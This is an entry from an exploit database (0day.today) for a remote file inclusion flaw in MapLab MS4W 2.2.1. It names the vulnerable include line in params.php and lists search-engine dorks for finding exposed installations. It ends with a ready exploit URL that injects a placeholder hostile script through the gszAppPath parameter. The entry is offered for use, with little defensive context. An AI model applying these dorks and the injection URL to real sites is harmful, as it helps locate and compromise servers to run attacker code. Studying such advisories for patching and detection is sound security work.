[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability

Author
ka0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1691
Category
web applications
Date add
01-04-2007
Platform
unsorted
=====================================================
MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability
=====================================================




Bug Found By ka0x
D.O.M TEAM
we are: anonyph;arp;ka0x;xarnuz
FROM SPAIN
---

Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org

--

Bug File: params.php
Path: /htdocs/gmapfactory/params.php

Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

--
Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

--

Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript] 



#  0day.today [2024-11-14]  #